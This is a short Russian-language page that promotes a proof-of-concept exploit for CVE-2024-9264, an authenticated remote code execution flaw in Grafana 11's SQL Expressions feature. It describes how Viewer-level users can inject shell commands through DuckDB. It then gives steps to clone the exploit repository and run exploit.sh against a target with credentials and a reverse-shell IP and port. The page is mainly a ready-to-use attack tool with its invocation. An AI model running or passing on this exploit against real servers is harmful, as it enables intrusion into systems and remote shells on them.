
Аутентифицированный RCE в Grafana (v11.0) через SQL Expressions - PoC-эксплойт
Аутентифицированный RCE в Grafana (v11.0) через SQL Expressions — PoC-эксплойт
CVE-2024-9264 — Grafana v11.0
Аутентифицированное удалённое выполнение кода (RCE)
PoC
CVE-2024-9264 — это критическая уязвимость удалённого выполнения кода и локального включения файлов, появившаяся в экспериментальной функции Grafana 11 «SQL Expressions». API передаёт пользовательский SQL напрямую в DuckDB CLI без надлежащей санитизации, поэтому любая аутентифицированная учётная запись с правами Viewer или выше может внедрять shell-команды или читать произвольные файлы, при условии, что бинарный файл duckdb находится в PATH сервера.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
Пример:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337